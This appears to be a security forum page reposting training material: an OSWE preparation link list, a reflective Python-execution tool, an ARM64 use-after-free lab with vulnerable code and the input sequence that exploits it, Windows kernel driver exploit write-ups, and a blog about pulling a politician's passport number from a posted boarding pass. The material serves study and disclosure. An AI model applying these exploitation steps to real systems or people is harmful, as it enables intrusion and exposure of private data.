Nytro

Orice ar folosi, teoretic, se poate. Practic, asta poate fi extrem de dificil si sa consume foarte mult timp (fara sa punem la socoteala skill-urile necesare). Doar daca cineva de pe forum are timp, eu pana termin cu RST Con nu prea o sa am timp.

Te referi la acele LPIC? Din cate am vazut eu cuprind multe lucruri si cred ca sunt si destul de recunoscute. Adica mi se par foarte OK.

Nu cred ca ai nevoie de VPN pentru bug bounty, te complici, nu o sa se ia nimeni de tine. Sunt multe servicii, ceva romanesc e RoTunneling al unui baiat de pe forum. Hidemyass (parca) am folosit in trecut pentru un engagement (la munca) si a fost ok.

Bun venit, daca te putem ajuta cu ceva nu ezita sa intrebi.

Partea cu acel Gigel care intra pe Zoom nu e chiar de joaca. Si se vede ca Romania nu este o tara atat de adaptata tehnologic cum se crede (vazand ca toti copii au smart phone-uri si stiu sa "isi bage" jocuri crackuite). Profesorii ar trebui sa stie si ei sa puna o parola la o conferinta de Zoom. E ok cand se intampla la clase mai mari dar daca e vorba de copii mai mici? Nu stii ce dubiosi pot sa apara.

OSWE/AWAE Preparation Jan 22, 2020 WebExploit Development Share on: updated Content AWAE1.5 OSWE Exam Preparation This post contains all trainings and tutorials that could be useful for offensive security’s OSWE certification. I will be updating the post during my lab and preparation for the exam. Course Syllabus: https://www.offensive-security.com/documentation/awae-syllabus.pdf Before registering for AWAE Lab: Get comfortable with python requests library Read Web Application Hacker’s handbook, again if you already did Get familiar with Burpsuite Get familiar with regex Get hands on with OWASP top 10 2017 Vulnerabilities Vulnerable Apps for practice on OWASP Portswigger WebSecAcademy Practice code review skills - OWASP SKF Before registering for the OSWE Exam: XSS to RCE AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting Chaining XSS, CSRF to achieve RCE Code analysis to gaining RCE Magento 2.3.1: Unauthenticated Stored XSS to RCE Mybb 18.20 From Stored XSS to RCE Bypassing File Upload Restrictions: [Paper] File Upload Restrictions Bypass Shell the web - Methods of a Ninja Unrestricted File Upload Atlassian Crowd Pre-auth RCE Popcorn machine from HackTheBox Vault machine from HackTheBox Authentication Bypass to RCE ATutor 2.2.1 Authentication Bypass ATutor LMS password_reminder TOCTOU Authentication Bypass ATutor 2.2.1 - Directory Traversal / Remote Code Execution Cubecart Admin Authentication Bypass Trendmicro smart protection bypass to RCE Password Reset Vulnerability Testing Password rest functionalities OWASP - Forgot Password Cheatsheet How we hacked multiple user accounts using weak reset tokens for passwords SQL Injection: RCE with SQL Injection - MSSQL SQL Injection to LFI to RCE - MySQL From SQLi to SHELL (I and II) - PentesterLab Pre-Auth Takeover of OXID eShops Blind SQL Injection [Paper] PostgreSQL Injection Having Fun With PostgreSQL Blind Postgresql Sql Injection Tutorial SQL Injection Cheat Sheet - PentestMonkey SQL Injection Cheat Sheet - PayloadAllTheThings Exploiting H2 SQL injection to RCE JavaScript Injection: Server Side JS Injection Remote Code Execution in math.js Arbitrary code execution in fast-redact NVIDIA GeForce Experience OS Command Injection - CVE-2019-5678 SetTimeout and SetInterval use eval therefore are evil Pentesting Node.js Application : Nodejs Application Security NodeJS remote debugging with vscode Escape NodeJS Sandboxes PHP Type Juggling: OWASP - PHPMagicTricks TypeJuggling PHP Type Juggling - Introduction Type Juggling, PHP Object Injection, SQLi Writing Exploits For PHP Type Juggling Type Juggling Authentication Bypass Vulnerability in CMS Made Simple PHP Magic Hashes Detailed Explanation of PHP Type Juggling Vulnerabilities [Video] PHP Type Juggling Vulnerabilities, Netsparker [Video] Falafel machine from HackTheBox Deserialization: Deserialization_Cheat_Sheet Insecure deserialization - PayloadAllthethings [Paper] Deserialization Vulnerability Serialization : A Big Threat JAVA Deserialization Understanding & practicing java deserialization exploits Understanding JAVA Deserialization Exploiting blind Java deserialization with Burp and Ysoserial Details on Oracle Web Logic Desrialization Analysis of Weblogic Deserialization [Video] Matthias Kaiser - Exploiting Deserialization Vulnerabilities in Java .NET Deserialization Use of Deserialization in .NET Framework Methods and Classes. Exploiting Deserialisation in ASP.NET via ViewState Remote Code Execution via Insecure Deserialization in Telerik UI [Video] Friday the 13th: JSON Attacks - BlackHat [Paper] Are you My Type? [Video] JSON Machine from HackTheBox - Ippsec PHP Object Injection/Deserialization What is PHP Object Injection phpBB 3.2.3: Phar Deserialization to RCE Exploiting PHP Desrialization Analysis of typo3 Deserialization Vulnerability Attack Surface of PHP Deserialization Vulnerability via Phar [Video] Intro to PHP Deserialization / Object Injection - Ippsec [Video] Advanced PHP Deserialization - Phar Files - Ippsec [Video] Exploiting PHP7 unserialize (33c3) NodeJS Deserialization Exploiting Node.js deserialization bug for Remote Code Execution The good, the bad and RCE on NodeJS applications Attacking Deserialization in JS Node.js Deserialization Attack – Detailed Tutorial [Video] Celestial machine from HackTheBox - Ippsec XML External Entity (XXE) Attack A Deep Dive into XXE Injection From XXE to RCE: Pwn2Win CTF 2018 Writeup Blind XXE to RCE Apache Flex BlazeDS XXE Vulnerabilty WebLogic EJBTaglibDescriptor XXE Server Side Template Injection (SSTI) [Portswigger Research] Server Side Template Injection [Video] SSTI : RCE For The Modern Web App - albinowax Server Side Template Injection Jinja2 template injection filter bypasses Exploitation of Server Side Template Injection with Craft CMS plugin SEOmatic <=3.1.3 Websocekts InSecurity Introduction to WebSockets [Video] Hacking with Websocket - BlackHat Remote Hardware takeover via Websocket Hijacking Cross-Site WebSocket Hijacking to full Session Compromise Source Code Audit Introduction to Code Review [PentesterLab] Static code analysis writeups TrendMicro - Secure Coding Dojo Bug Hunting with Static Code Analysis [Video] Shopify Remote Code Execution - Hackerone Finding vulnerabilities in source code ( APS.NET) A deep dive into ASP.NET Deserialization Writeups by mr_me Youtube Playlist Further References/Reviews From AWAE to OSWE the preperation guide - hansesecure OSWE Exam Review 2020 Notes gifts inside - 21y4d OSWE Cheat Sheet - V1s3r1on wetw0rk/AWAE-PREP https://codewhitesec.blogspot.com/ https://blog.ripstech.com/ https://rhinosecuritylabs.com Sursa: https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/

Zolom C# Executable with embedded Python that can be used reflectively to run python code on systems without Python installed Usage zolom.exe --script:"from random import seed; from random import random; seed(1); print 'getting random number'; print random();" zolom.exe --b64script:"ZnJvbSByYW5kb20gaW1wb3J0IHNlZWQ7IGZyb20gcmFuZG9tIGltcG9ydCByYW5kb207IHNlZWQoMSk7IHByaW50ICdnZXR0aW5nIHJhbmRvbSBudW1iZXInOyBwcmludCByYW5kb20oKTs=" Building Using Visual Studio restore the nuget packages and then click build. Adding more modules Unzip the Lib.zip file and add your modules, rezip the file and embed as a resource, finally recompile and your new lib should be available Sursa: https://github.com/checkymander/Zolom

ARM64 Reversing and Exploitation Part 2 - Use After Free SEPTEMBER 6, 2020 In this blog post, we will be exploiting a Use-after-free vulnerability in the vuln binary. The binaries for this and the next article can be found here. This UaF challenge is based on the one used by Protostar Use-after-free vulnerabilities occurs on the use of heap allocated memory after it has been freed. This can lead to several unexpected behaviours, from a crash to code execution. Anyways, let’s get started. Copy the vuln binary to your iOS or Corellium device. Run the binary vuln. You get a message that says “Better luck next time” Let’s open the binary in Hopper to see what’s going on. Let’s have a look at the main function. Just like the previous example on Heap Overflow, our objective here is to jump the useafterfree function. For that, we need to pass in the argument uaf The function then jumps execution to the function useafterfree ./vuln uaf The output shows the address of the user and the customerChat object. We see several commands here, however on reversing the function, we find there is another hidden command reset that basically frees the user object. This can be confirmed by looking at the code itself void useafterfree(char *input){ printf("Use after free challenge. Try to log in without entering the password. Available commands are:\na) username XYZ\nb) login\nc) customerChat XYZ.\n"); char line[0x400]; while(1) { printf("{user = %p, customerChat = %p }\n", user, customerChat); if(fgets(line, sizeof(line), stdin) == NULL) break; if(strncmp(line, "username ", 9) == 0) { user = malloc(sizeof(struct currentUser)); memset(user, 0, sizeof(struct currentUser)); if(strlen(line + 5) < 0x100) { printf("Setting username\n"); strcpy(user->username, line + 9); } } if(strncmp(line, "reset", 5) == 0) { printf("Freeing user object\n"); free(user); } if(strncmp(line, "customerChat ", 13) == 0) { customerChat = strdup(line + 12); } if(strncmp(line, "currentUser", 11) == 0) { printf("Current user is %s", user->username); } if(strncmp(line, "login", 5) == 0) { if(strncmp(user->password, "BBB", 3) == 0) { printf("You have successfully logged in with password %s!\n", user->password); } else { printf("Please enter your password\n"); printf("current password is %s\n", user->password); } } } } We see that the user struct object has an attribute password . This is being checked later on. If the password has three B’s, the user gets logged in. if(strncmp(user->password, "BBB", 3) == 0) { printf("You have successfully logged in with password %s!\n", user->password); } This is an example of a UaF since the user object can be freed by using the reset command and then calling if(user->password) will basically trigger the UaF. We can also calculate the size of the user object. The user object is a object of struct currentUser as can be seen in the following line user = malloc(sizeof(struct currentUser)); struct currentUser { char username[0x100]; char password[4]; }; The size of the user object is 256 + 4 = 260 bytes. If we can free the user object using reset and then overwrite it with the value BBBB such that we are able to overwrite the password property, we might be able to execute a Use-after-free condition and successfully log in. Since our objective is to login, so let’s try that by first entering the username command, $username admin $login Now let’s enter the reset command, this will free the buffer. Now let’s enter the customerChat command followed by the chat and send 260 B’s (so the size of cutomerChat object is the same as than of user object), we keep entering the size of the chat around the same size of the user so that it can take over the memory address of the freed user object. After some tries, we see that the customerChat address is overlapping the user address, in this case we were able to overwrite the password property of the freed user object with all B’s. And hence entering the login command again gives us a success. Command in order username admin login reset customerChat BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB login Sursa: http://highaltitudehacks.com/2020/09/06/arm64-reversing-and-exploitation-part-2-use-after-free/

HEVD writeups Sep 15, 2020 Yuvaly0 Intro This writeups do not aim to replace all of the existing good places already. I wrote them so I could get deeper understanding of the vulnerabilities I’ve decided to write writeups only for the vulns that interested me the most. There are references to the articles I used in the git repo. At the end of each section, I put a reference to the full source code Non Paged Pool Overflow Double Fetch Non Paged Pool Overflow This bug will occur when writing data passed the end of a buffer, in this case, the buffer is in the non paged pool. For example, a function receives a buffer and just copies it to her buffer without checking its length. Analysing the binary We are interested in the function TriggerNonPagedPoolOverflow First of all the function creates a chunk using the function ExAllocatePoolWithTag, the requested chunk is in size of 0x1f8, it’s tag will be ‘Hack’ and it will be allocated in the non paged pool. We’re given the information mentioned above and some info on our sent buffer Next, they use memcpy to copy our buffer with our given size (the vulnerability) to their buffer without any size checking. Lastly, they free the chunk. Explotation Our goal is to pop a cmd with system permissions Derandomize the pool (get to a predictable state) - pool spray Trigger the overflow and overwrite an address with a shellcode address jump to the shellcode and pop a cmd We cant just the overwrite the buffer because it will mess up the pool structure and cause a BSOD: Derandomize the pool We will be using a technique called pool spray.</br> This technique is used to get the pool to a controlled state, this is possible because of its allocator mechanism. But with what objects? We can use the event object, they are each sizeof 0x40, but if we will multiply by 8 will get 0x200 which is the size of our driver allocated chunk 0x1f8 (+ 0x8 for the _POOL_HEADER struct) The idea is that the first wave will derandomize and the second wave will start in a state where the pool is already derandomized. We could do it in one wave. Some handles address, so we could check the state with windbg We can see that because we freed 8 consecutive chunks, they became one big chunk in size of 0x200 (including the pool header) Trigger Overflow The TypeIndex field in the _OBJECT_HEADER is an index to a table of pointers that will point to different OBJECT_TYPE types. Inside the OBJECT_TYPE, there are a couple of pointers for functions, such as: OkayToCloseProcedure, CloseProcedure.</br> See below So if we could overwrite the pointer to the table, causing it to point to another index in the table say - the first index, 0, is a null pointer, because we are operating on windows 7 we can allocate a null page and simulate the OBJECT_TYPE struct there, giving us the ability to control EIP But we cannot just overwrite the object header with random or even some other chunk metadata because its unsafe. Because we know that we will overwrite an event object we can take one of our known headers, after all, we know all of them are the same (at least until the Lock field offset, which is 0 anyway). Getting system Now we need to concat all of our previous steps and run the program: full source code Double Fetch This kind of bug happens when the user-supplied data is fetched twice, for example, there is an ioctl that receives an array of chars and its length, if the function will check the size and will copy using it (the same reference to the variable). It will expose itself to the double-fetch bug. This is also called TOC-TOU, TimeOfCheck and TimeOfUse, when you are fetching this value for the second time you are exposing yourself to the fact that the user will be able to change this data between the check and the use thus the vulnerability. Analysing the binary We are interested in the function TriggerDoubleFetch. First of all the function prints for us some data. Then a check is made, the size that we supplied vs the size of the kernel buffer size to prevent overflow If we passed the check, our buffer is copied to the kernel buffer using memcpy and the size we sent. The fact that the function “fetches” the size twice we have a window of opportunities to change its value. So if we look again at what we can achieve, we can get OOB(out of bounds) write on the stack. Explotation Ok, so we want two things to happen Change the value before its use and after the check. Jump to an arbitrary address of our choosing So we will run two threads, one that will repeatedly engage with the driver and will trigger a double fetch vulnerability and another to change the value of the size being sent. Ok, let’s create two threads and attach our functions To pop a cmd with system we need to consider something else like our computer resources At first, my VM was with one processor, we must think about our OS resources, for example, how much processors we have? a low number (<4) will give us a hard time when trying to exploit. It took me quite some time to trigger the exploit using two processors Also, we need to consider the fact that our threads are not alone in the system and we are not even in the highest priority for our system Let’s change our threads priority And a check to verify the number of processors Now we can run the exploit with success Another thing we can do is set each of our threads to a different processor, so he will not be competing with our second thread about the processor resources where i represents the location of a bit in a bitmask that represents the processor number</br> (i == 0 -> first processor) of course, we will set by our machine capabilities or the call will fail. full source code updated_at 15-09-2020 Sursa: https://yuvaly0.github.io/2020/09/15/hevd-writeups.html

mango.pdf.zone "work" by the hacker known as "Alex" / @mangopdf When you browse Instagram and find former Australian Prime Minister Tony Abbott's passport number Do not get arrested challenge 2020 Sep 15, 2020 • mangopdf (Alex Hope) Act 1: Sunday afternoon So you know when you’re flopping about at home, minding your own business, drinking from your water bottle in a way that does not possess any intent to subvert the Commonwealth of Australia? It’s a feeling I know all too well, and in which I was vigorously partaking when I got this message in “the group chat”. A nice message from my friend, with a photo of a boarding pass 🙂 A good thing about messages from your friends is that they do not have any rippling consequences 🙂🙂🙂 The man in question is Tony Abbott, one of Australia’s many former Prime Ministers. That’s him, officer For security reasons, we try to change our Prime Minister every six months, and to never use the same Prime Minister on multiple websites. The boarding pass photo This particular former PM had just posted a picture of his boarding pass on Instagram (Instagram, in case you don’t know it, is an app you can open up on your phone any time to look at ads). The since-deleted Instagram post showing the boarding pass and baggage receipt. The caption reads “coming back home from japan 😍😍 looking forward to seeing everyone! climate change isn’t real 😌 ok byeee” “Can you hack this man?” My friend (who we will refer to by their group chat name, 𝖍𝖔𝖌𝖌𝖊 𝖒𝖔𝖆𝖉𝖊) is asking whether I can “hack this man” not because I am the kind of person who regularly commits 𝒄𝒚𝒃𝒆𝒓 𝒕𝒓𝒆𝒂𝒔𝒐𝒏 on a whim, but because we’d recently been talking about boarding passes. I’d said that people post pictures of their boarding passes all the time, not knowing that it can sometimes be used to get their passport number and stuff. They just post it being like “omg going on holidayyyy 😍😍😍”, unaware that they’re posting cringe. People post their boarding passes all the time, because it’s not clear that they’re meant to be secret Meanwhile, some hacker is rubbing their hands together, being all “yumyum identity fraud 👀” in their dark web Discord, because this happens a lot. So there I was, making intense and meaningful eye contact with this chat bubble, asking me if I could “hack this man”. Surely you wouldn’t Of course, my friend wasn’t actually asking me to hack the former Prime Minister. However. You gotta. I mean… what are you gonna do, not click it? Are you gonna let a link that’s like 50% advertising tracking ID tell you what to do? Wouldn’t you be curious? The former Prime Minister had just posted his boarding pass. Was that bad? Was someone in danger? I didn’t know. What I did know was: the least I could do for my country would be to have a casual browse 👀 Investigating the boarding pass photo Step 1: Hubris So I had a bit of a casual browse, and got the picture of the boarding pass, and then…. I didn’t know what was supposed to happen after that. Well, I’d heard that it’s bad to post your boarding pass online, because if you do, a bored 17 year-old Russian boy called “Katie-senpai” might somehow use it to commit identity fraud. But I don’t know anyone like that, so I just clumsily googled some stuff. Googling how 2 hakc boarding pass Eventually I found a blog post explaining that yes, pictures of boarding passes can indeed be used for Crimes. The part you wanna be looking at for all your criming needs is the barcode, because it’s got the “Booking Reference” (e.g. H8JA2A) in it. Why do you want the booking reference? It’s one of the two things you need to log in to the airline website to manage your flight. The second one is your… last name. I was really hoping the second one would be like a password or something. But, no, it’s the booking reference the airline emails you and prints on your boarding pass. And it also lets you log in to the airline website? That sounds suspiciously like a password to me, but like I’m still fine to pretend it’s not if you are. Step 2: Scan the barcode I’ve been practicing every morning at sunrise, but still can’t scan barcodes with my eyes. I had to settle for a barcode scanner app on my phone, but when I tried to scan the picture in the Instagram post, it didn’t work Maybe I shouldn’t have blurred out the barcode first Step 2: Scan the barcode, but more Well, maybe it wasn’t scanning because the picture was too blurry. I spent around 15 minutes in an “enhance, ENHANCE” montage, fiddling around with the image, increasing the contrast, and so on. Despite the montage taking up way too much of the 22 minute episode, I couldn’t even get the barcode to scan. Step 2: Notice that the Booking Reference is printed right there on the paper After staring at this image for 15 minutes, I noticed the Booking Reference is just… printed on the baggage receipt. I graduated university. But it did not prepare me for this. askdjhaflajkshdflkh Step 3: Visit the airline’s website After recovering from that emotional rollercoaster, I went to qantas.com.au, and clicked “Manage Booking”. In case you don’t know it because you live in a country with fast internet, Qantas is the main airline here in Australia. (I also very conveniently started recording my screen, which is gonna pay off big time in just a moment.) Step 4: Type in the Booking Reference Well, the login form was just… there, and it was asking for a Booking Reference and a last name. I had just flawlessly read the Booking Reference from the boarding pass picture, and, well… I knew the last name. I did hesitate for a split-second, but… no, I had to know. Step 5: Crimes(?) youngman.mp4 The “Manage Booking” page, logged in as some guy called Anthony Abbott Can I get a YIKES in the chat Leave a comment if you really felt that. I guess I was now logged the heck in as Tony Abbott? And for all I know, everyone else who saw his Instagram post was right there with me. It’s kinda wholesome, to imagine us all there together. But also probably suboptimal in a governmental sense. Was there anything secret in here? I then just incredibly browsed the page, browsed it so hard. I saw Tony Abbott’s name, flight times, and Frequent Flyer number, but not really anything super secret-looking. Not gonna be committing any cyber treason with a Frequent Flyer number. The flight was in the past, so I couldn’t change anything, either. The page said the flight had been booked by a travel agent, so I guessed some information would be missing because of that. I clicked around and scrolled a considerable length, but still didn’t find any government secrets. Some people might give up here. But I, the Icarus of computers, was simply too dumb to know when to stop. We’re not done just because a web page says we’re done I wanted to see if there were juicy things hidden inside the page. To do it, I had to use the only hacker tool I know. Right click > Inspect Element, all you need to subvert the Commonwealth of Australia Listen. This is the only part of the story that might be confused for highly elite computer skill. It’s not, though. Maybe later someone will show you this same thing to try and flex, acting like only they know how to do it. You will not go gently into that good night. You will refuse to acknowledge their flex, killing them instantly. How does “Inspect Element” work? “Inspect Element”, as it’s called, is a feature of Google Chrome that lets you see the computer’s internal representation (HTML) of the page you’re looking at. Kinda like opening up a clock and looking at the cool cog party inside. Yeahhh go little cogs, look at ‘em absolutely going off. Now imagine this but with like, JavaScript Everything you see when you use “Inspect Element” was already downloaded to your computer, you just hadn’t asked Chrome to show it to you yet. Just like how the cogs were already in the watch, you just hadn’t opened it up to look. But let us dispense with frivolous cog talk. Cheap tricks such as “Inspect Element” are used by programmers to try and understand how the website works. This is ultimately futile: Nobody can understand how websites work. Unfortunately, it kinda looks like hacking the first time you see it. If you’d like to know more about it, I’ve prepared a short video. Browsing the “Manage Booking” page’s HTML I scrolled around the page’s HTML, not really knowing what it meant, furiously trying to find anything that looked out of place or secret. I eventually realised that manually reading HTML with my eyes was not an efficient way of defending my country, and Ctrl + F’d the HTML for “passport”. oh no Oh yes It’s just there. At this point I was fairly sure I was looking at the extremely secret government-issued ID of the 28th Prime Minister of the Commonwealth of Australia, servant to her Majesty Queen Elizabeth II and I was kinda worried that I was somehow doing something wrong, but like, not enough to stop. ….anything else in this page? Well damn, if Tony Abbott’s passport number is in this treasure trove of computer spaghetti, maybe there’s wayyyyy more. Perhaps this HTML contains the lost launch codes to the Sydney Opera House, or Harold Holt. Maybe there’s a phone number? Searching for phone and number didn’t get anywhere, so I searched for 614, the first 3 digits of an Australian phone number, using my colossal and highly celestial galaxy brain. Weird uppercase letters A weird pile of what I could only describe as extremely uppercase letters came up. It looked like this: RQST QF HK1 HNDSYD/03EN|FQTV QF HK1|CTCM QF HK1 614[phone number]|CKIN QF HN1 DO NOT SEAT ROW [row number] PLS SEAT LAST ROW OF [row letter] WINDOW So, there’s a lot going on here. There is indeed a phone number in here. But what the heck is all this other stuff? I realised this was like… Qantas staff talking to eachother about Tony Abbott, but not to him? In what is surely the subtweeting of the century, it has a section saying HITOMI CALLED RQSTING FASTTRACK FOR MR. ABBOTT. Hitomi must be requesting a “fasttrack” (I thought that was only a thing in movies???) from another Qantas employee. This is messed up for many reasons What is even going on here? Why do Qantas flight staff talk to eachother via this passenger information field? Why do they send these messages, and your passport number to you when you log in to their website? I’ll never know because I suddenly got distracted with Forbidden airline code I realised the allcaps muesli I saw must be some airline code for something. Furious and intense googling led me to several ancient forbidden PDFs that explained some of the codes. Apparently, they’re called “SSR codes” (Special Service Request). There are codes for things like “Vegetarian lacto-ovo meal” (VLML), “Vegetarian oriental meal” (VOML), and even “Vegetarian vegan meal” (VGML). Because I was curious about these codes, here’s some for you to be curious about too (tag urself, I’m UMNR😞 RFTV Reason for Travel UMNR Unaccompanied minor PDCO Carbon Offset (chargeable) WEAP Weapon DEPA Deportee—accompanied by an escort ESAN Passenger with Emotional Support Animal in Cabin The phone number I found looked like this: CTCM QF HK1 [phone number]. Googling “SSR CTCM” led me to the developer guide for some kind of airline association, which I assume I am basically a member of now. CTCM QF HK1 translates as “Contact phone number of passenger 1” Is the phone number actually his? I thought maybe the phone number belonged to the travel agency, but I checked and it has to be the passenger’s real phone number. That would be, if my calculations are correct,,,, *steeples fingers* Tony Abbott’s phone number. what have i done I’d now found Tony Abbott’s: Passport details Phone number Weird Qantas staff comments. My friend who messaged me had no idea. Tony Abbott’s passport is probably a Diplomatic passport, which is used to “represent the Australian Government overseas in an official capacity”. what have i done By this point I’d had enough defending my country, and had recently noticed some new thoughts in my brain, which were: oh jeez oh boy oh jeez i gotta get someone, somehow, to reset tony abbott’s passport number can you even reset passport numbers is it possible that i’ve done a crime Intermission Act 2: Do not get arrested challenge 2020 In this act, I, your well-meaning but ultimately incompetent protagonist, attempt to do the following things: ⬜ figure out whether i have done a crime ⬜ notify someone (tony abbott?) that this happened ⬜ get permission to publish this here blog post ⬜ tell qantas about the security issue so they can fix it Spoilers: This takes almost six months. Let’s skip the boring bits I contacted a lot of people about this. If my calculations are correct, I called at least 30 phone numbers, to say nothing of The Emails. If you laid all the people I contacted end to end along the equator, they would die, and you would be arrested. Eventually I started keeping track of who I talked to in a note I now refer to as “the hashtag struggle”. I’m gonna skip a considerable volume of tedious and ultimately unsatisfying telephony, because it’s been a long day of scrolling already, and you need to save your strength. Alright strap yourself in and enjoy as I am drop-kicked through the goal posts of life. Part 1: is it possible that i’ve done a crime I didn’t think anything I did sounded like a crime, but I knew that sometimes when the other person is rich or famous, things can suddenly become crimes. Like, was there going to be some Monarch Law or something? Was Queen Elizabeth II gonna be mad about this? My usual defence against being arrested for hacking is making sure the person being hacked is okay with it. You heard me, it’s the power of ✨consent✨. But this time I could uh only get it in retrospect, which is a bit yikes. So I was wondering like… was logging in with someone else’s booking reference a crime? Was having someone else’s passport number a crime? What if they were, say, the former Prime Minister? Would I get in trouble for publishing a blog post about it? I mean you’re reading the blog post right now so obviousl Update: I have been arrested. Just straight up Reading The Law It turned out I could just google these things, and before I knew it I was reading “the legislation”. It’s the rules of the law, just written down. Look, reading pages of HTML? No worries. Especially if it’s to defend my country. But whoever wrote the legislation was just making up words. Eventually, I was able to divine the following wisdoms from the Times New Roman tea leaves: Defamation is where you get in trouble for publishing something that makes someone look bad. But, it’s fine for me to blog about it, since it’s not defamation if you can prove it’s true Having Tony Abbott’s passport number isn’t a crime But using it to commit identity fraud would be There are laws about what it’s okay to do on a computer The things it’s okay to do are: If u EVER even LOOK at a computer the wrong way, the FBI will instantly slam dunk you in a legal fashion dependent on the legislation in your area I am possibly the furthest thing you can be from a lawyer. So, I’m sure I don’t need to tell you not to take this as legal advice. But, if you are the kind of person who takes legal advice from mango blog posts, who am I to stand in your way? Not a lawyer, that’s who. Don’t do it. You know what, maybe I needed help. From an adult. Someone whose 3-year old kid has been buying iPad apps for months because their parents can’t figure out how to turn it off. “Yeah, maybe I should get some of that free government legal advice”, I thought to myself, legally. That seemed like a pretty common thing, so I thought it should be easy to do. I took a big sip of water and googled “free legal advice”. trying to ask a lawyer if i gone and done a crime Before I went and told everyone about my HTML frolicking, I spent a week calling legal aid numbers, lawyers, and otherwise trying to figure out if I’d done a crime. During this time, I didn’t tell anyone what I’d done. I asked if any laws would be broken if “someone” had “logged into a website with someone’s publicly-posted password and found the personal information of a former politician”. Do you see how that’s not even a lie? I’m starting to see how lawyers do it. Calling Legal Aid places First I call the state government’s Legal Aid number. They tell me they don’t do that here, and I should call another Legal Aid place named something slightly different. The second place tells me they don’t do that either, and I should call the First Place and “hopefully you get someone more senior”. I call the First Place again, and they say “oh you’ve been given the run around!”. You see where this is going. Let’s skip a lot of phone calls. Take my hand as I whisk you towards the slightly-more-recent past. Based on advice I got from two independent lawyers that was definitely not legal advice: I haven’t done a crime. Helllllll yeah. But I mean it’s a little late because I forgot to mention that by this point I had already emailed explicit details of my activities to the Australian Government. ☑️ figure out whether i have done a crime ⬜ notify someone (tony abbott?) that this happened ⬜ get permission to publish this here blog post ⬜ tell qantas about the security issue so they can fix it Part 2: trying to report the problem to someone, anyone, please I had Tony Abbott’s passport number, phone number, and weird Qantas messages about him. I was the only one who knew I had these. Anyone who saw that Instagram post could also have them. I felt like I had to like, tell someone about this. Someone with like, responsibilities. Someone with an email signature. wait but do u see the irony in this, u have his phone number right there so u could just- Yes I see it thank u for pointing this out, wise, astute, and ultimately self-imposed heading. I knew I could just call the number any time and hear a “G’day” I’d never be able to forget. I knew I had a rare opportunity to call someone and have them ask “how did you get this number!?”. But you can’t just do that. You can’t just call someone’s phone number that you got by rummaging around in the HTML ball pit. Tony Abbott didn’t want me to have his phone number, because he didn’t give it to me. Maybe if it was urgent, or I had no other option, sure. But I was pretty sure I should do this the Nice way, and show that I come in peace. I wanted to show that I come in peace because there’s also this pretty yikes thing that happens where you email someone being all like “henlo ur website let me log in with username admin and password admin, maybe u wanna change that??? could just be me but let me kno what u think xoxo alex” and then they reply being like “oh so you’re a HACKER and a CRIMINAL and you’ve HACKED ME AND MY FAMILY TOO and this is a RANSOM and ur from the DARK WEB i know what that is i’ve seen several episodes of mr robot WELL watch out kiddO bc me and my lawyers are bulk-installing tens of thousands of copies of McAfee® Gamer Security as we speak, so i’d like 2 see u try” Surely you just contact Tony Abbott officially I googled “tony abbott contact”, but there’s only his official website. There’s no phone number on it, only a “contact me” form. I imagine there have been some passionate opinions typed into this form at 9pm on a Tuesday Yeah right, have you seen the incredible volume of #content people want to say at politicians? No way anyone’s reading that form. I later decided to try anyway, using the same Inspect Element ritual from earlier. Looking at the network requests the page makes, I divined that the “Contact me” form just straight up does not work. When you click “submit”, you get an error, and nothing gets sent. This is an excellent way of using computers to solve the problem of “random people keep sending me angry letters” Well rip I guess. I eventually realised the people to talk to were probably the government. The government It’s a big place. In the beginning, humans developed the concept of language by banging rocks together and saying “oof, oog, and so on”. Then something went horribly wrong, and now people unironically begin every sentence with “in regards to”. Our story begins here. The government has like fifty thousand million different departments, and they all know which acronyms to call each other, but you don’t. If you EVER call it DMP&C instead of DPM&C you are gonna be express email forwarded into a nightmare realm the likes of which cannot be expressed in any number of spreadsheet cells, in spite of all the good people they’ve lost trying. I didn’t even know where to begin with this. Desperately, I called Tony Abbott’s former political party, who were all like Skip skip skip a few more calls like this. Maybe I knew someone who knew someone That’s right, the true government channels were the friends we made along the way. I asked hacker friends who seemed like they might know government security people. “Where do I report a security issue with like…. a person, not a website?” They told me to call… 1300 CYBER1? 1300 CYBER1 I don’t really have a good explanation for this so I’m just gonna post the screenshots. My friend showing me where to report a security issue with the government. I’m gonna need you to not ask any questions about the profile pictures. Uhhh no wait I don’t wanna click any of these The planet may be dying, but we live in a truly unparalleled age of content. You know I smashed that call button on 1300 CYBER1. Did they just make it 1300 CYBER then realise you need one more digit for a phone number? Incredible. Calling 1300 c y b e r o n e “Yes yes hello, ring ring, is this 1300 cyber one”? They have to say yes if you ask that. They’re legally obligated. The person who picked up gave me an email address for ASD (the Australian flavour of America’s NSA), and told me to email them the details. Emailing the government my crimes Feeling like the digital equivalent of three kids in a trenchcoat, I broke out my best Government Email dialect and emailed ASD, asking for them to call me if they were the right place to tell about this. Sorry for the clickbait subject but well that’s what happened??? Fooled by my flawless disguise, they replied instantly (in a relative sense) asking for more details. “Potential” exposure, yeah okay. At least the subject line had “[SEC=Sensitive]” in it so I _knew_ I’d made it big I absolutely could provide them with more information, so I did, because I love to cooperate with the Australian government. I also asked whether they could give me permission to publish this blog post, and they were all like “Seen 2:35pm”. Eventually, after another big day of getting left on read by the government, they replied, being all like “thanks kiddO, we’re doing like, an investigation and stuff, so we’ll take it from here”. Overall, ASD were really nice to me about it and happy that I’d helped. They encouraged me to report this kind of thing to them if it happened again, but I’m not really in the business of uhhhhhhhh whatever the heck this is. By the way, at this point in the story (chronologically) I had no idea if what I was emailing the government was actually the confession to a crime, since I hadn’t talked to a lawyer yet. This is widely regarded as a bad move. I do not recommend anyone else use “but I’m being so helpful and earnest!!!” as a legal defence. But also I’m not a lawyer, so idk, maybe it works? Wholesomely emailing the government At one point in what was surely an unforgettable email chain, the person I was emailing added a P.S. containing…. the answer to the puzzle hidden on this website. The one you’re reading this blog on right now. Hello. I guess they must have found this website (hi asd) by stalking the email address I was sending from. This is unprecedented and everything, but: The puzzle says to tweet the answer at me, not email me The prize for doing the puzzle is me tweeting this gif 